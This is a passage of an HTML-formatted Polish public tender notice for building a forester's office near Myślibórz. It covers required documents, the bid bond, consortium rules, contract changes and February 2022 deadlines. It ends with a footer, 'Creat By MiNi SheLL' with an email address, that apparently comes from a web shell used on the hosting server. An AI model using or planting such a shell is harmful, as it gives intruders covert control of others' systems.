w:a)art.108ust.1pkt3PZP,b)art.108ust.1pkt4PZP,dot.orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka zapobiegawczego,c)art.108ust.1pkt5PZP,dotyczących zawarcia<br/>z innymi wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,d)art.108ust.1pkt6PZP,e)art.109ust.1pkt1PZP,odnośnie do naruszenia obowiązków<br/>dotyczących płatności podatków i opłat lokalnych,o których mowa w ustawie z dn.12.01.1991r.o<br/>podatkach i opłatach lokalnych(tekst jedn.Dz.U.z2019r.,poz.1170 z<br/>późn.zm.),f)art.109ust.8i10PZP.Wykonawca w trybie art.274ust.1PZP zostanie wezwany do złożenia<br/>dokumentów,o których mowa wyżej w pkt1),3)-6)dot. podmiotu udostępniającego Wykonawcy zasoby,<br/>na zasadach określonych w art.118PZP(o ile Wykonawca polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej tych podmiotów.Jeżeli Wykonawca ma siedzibę<br/>lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast dokumentów wskazanych<br/>wyżej w pkt1),3)-5)składa dokumenty zgodnie z wymaganiami opisanymi w pkt9.5-9.7SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o<br/>których mowa w pkt 7.1. SWZ Zamawiający działając na podstawie art. 274 ust. 1 PZP wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania,<br/>aktualnych na dzień złożenia następujących podmiotowych środków dowodowych: 1) informacji banku<br/>lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej<br/>złożeniem, Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez<br/>Zamawiającego podmiotowych środków dowodowych, o których mowa wyżej w pkt 1), Wykonawca<br/>składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie<br/>opisanego przez Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej<br/>lub finansowej; 2) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych<br/>wspólnie z innymi Wykonawcami wykaz, o którym mowa wyżej dotyczy robót budowlanych, w których<br/>wykonaniu Wykonawca ten bezpośrednio uczestniczył. Okres wyrażony w latach, o którym mowa<br/>wyżej, liczy się wstecz od dnia w którym upływa termin składnia ofert (wzór wykazu robót budowlanych<br/>stanowi załącznik nr 7 do SWZ); 3) dowodów określających, że wskazane przez Wykonawcę roboty<br/>budowlane na potwierdzenie spełnienia warunku udziału w postępowaniu dot. zdolności technicznej<br/>lub zawodowej w zakresie doświadczenia zostały wykonane należycie. Dowodami, o których mowa<br/>wyżej, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty; 4) wykazu osób, skierowanych przez<br/>Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień (numer<br/>oraz zakres uprawnień zapewniających prawo wykonywania samodzielnych funkcji technicznych w<br/>budownictwie, z podaniem daty i pełnej podstawy prawnej ich wydania) niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości: 5 900,00 zł (słownie złotych: pięć<br/>tysięcy dziewięćset 00/100 PLN). Wadium należy wnieść przed upływem terminu składania ofert<br/>i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków,<br/>o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP. 2. Wadium może być wnoszone<br/>według wyboru Wykonawcy w jednej lub kilku następujących formach:1) pieniądzu, 2)<br/>gwarancjach bankowych, 3) gwarancjach ubezpieczeniowych, 4) poręczeniach udzielonych<br/>przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r., poz. 299).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w banku BNP Paribas Bank Polska SA nr rachunku: 85 2030 0045 1110 0000<br/>0038 7060 z dopiskiem: „wadium na zabezpieczenie oferty w postępowaniu pn. „Budowa<br/>samodzielnej kancelarii leśniczego w Leśnictwie Otanów wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu na działce o nr ewid. 63/14, 245/3, gmina Myślibórz,<br/>obręb Otanów”. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w<br/>podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium<br/>wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 4. Z treści wadium<br/>wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach<br/>udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada<br/>2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać<br/>bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP. 5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa wyżej w pkt 2. ppkt 2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego<br/>wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta<br/>Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie<br/>będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek<br/>o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z<br/>postępowania na podstawie art. 226 ust. 1 pkt 14 PZP w zw. z art. 266 PZP. 6. Treść gwarancji<br/>wadialnej musi zawierać następujące elementy: 1) nazwę dającego zlecenie (Wykonawcy),<br/>beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji<br/>ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib, 2) określenie<br/>wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu<br/>zamówienia, 3) kwotę gwarancji/poręczenia, 4) zobowiązanie gwaranta/poręczyciela do<br/>zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne<br/>żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP. 7. Zamawiający<br/>zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać<br/>umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa<br/>załączonego do oferty - treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie o spełnieniu warunków<br/>udziału w postępowaniu (wg wzoru stanowiącego załącznik nr 3A do SWZ) oraz oświadczenie o<br/>braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 3B do SWZ) składa każdy<br/>z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu. Oświadczenia Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, o których mowa wyżej powinny zostać złożone wraz z<br/>ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. obowiązany będzie złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy i wniesienie zabezpieczenia należytego<br/>wykonania umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania<br/>poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w<br/>całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia łącznie lub każdego z osobna.<br/>8) Na mocy art. 117 ust. 4 PZP, Wykonawcy będą zobowiązani złożyć wraz z ofertą<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy -<br/>oświadczenie takie należy złożyć w sytuacji gdy, stosownie do postanowień pkt 7.3.,<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą polegać na zdolnościach (w<br/>odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia) tych z<br/>Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane. Wzór stosownego oświadczenia został zawarty w treści formularza Oferty<br/>stanowiącego załącznik nr 1 SWZ i Zamawiający zaleca złożyć to oświadczenie właśnie w tym<br/>formularzu. Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 PZP odnosi się<br/>również do wykonawców, prowadzących działalność w formie spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian oraz warunki ich wprowadzenia szczegółowo zostały opisane w<br/>projektowanych postanowieniach umowy, które stanowią załącznik nr 4 do SWZ. 1.<br/>Zamawiający na podstawie art. 455 ust. 1 pkt 1 PZP, przewiduje możliwość dokonania<br/>następujących zmian Umowy: (1) w zakresie zmiany terminów realizacji poszczególnych robót<br/>określonych w Harmonogramie oraz Terminu Wykonania; (2)w zakresie zmiany kolejności<br/>wykonywania lub zmiany terminów wykonania poszczególnych świadczeń wchodzących w skład<br/>Przedmiotu Umowy w stosunku do terminów określonych w Harmonogramie, jednakże bez<br/>dokonywania zmiany Terminu Wykonania. (3) w zakresie zmiany sposobu wykonania<br/>Przedmiotu Umowy związanej z koniecznością zrealizowania Przedmiotu Umowy przy<br/>zastosowaniu innych rozwiązań technicznych lub technologicznych, w szczególności robót zamiennych, (4) W zakresie zmiany Wynagrodzenia, w przypadku, gdy zmiany, o których mowa w pkt (3) będą miały wpływ na koszty wykonania Przedmiotu Umowy przez Wykonawcę. <br/>(4) W zakresie zmiany Wynagrodzenia, w przypadku, gdy zmiany, o których mowa w pkt (3) będą miały wpływ na koszty wykonania Przedmiotu Umowy przez Wykonawcę.<br/>2.Inicjatorem zmian w Umowie może być każda ze Stron, z tym, że ostateczna decyzja, co do<br/>wprowadzenia zmian i ich zakresu należy do Zamawiającego. Wystąpienie którejkolwiek z okoliczności mogących powodować zmianę umowy, nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania zmian, ani nie może stanowić podstawy do jakichkolwiek roszczeń Wykonawcy do ich dokonania. 3. Niezależnie od postanowień niniejszego paragrafu, Strony dopuszczają możliwość (i) zmian redakcyjnych Umowy oraz (ii) zmian danych Stron<br/>ujawnionych w rejestrach publicznych, nie stanowiących zmiany, o której mowa w art. 455 ust. 1 PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy (SmartPZP) - https://portal.smartpzp.pl/nadlesnictwo_mysliborz, do dnia 11.02.2022 r., godz. 10:00.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-11 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com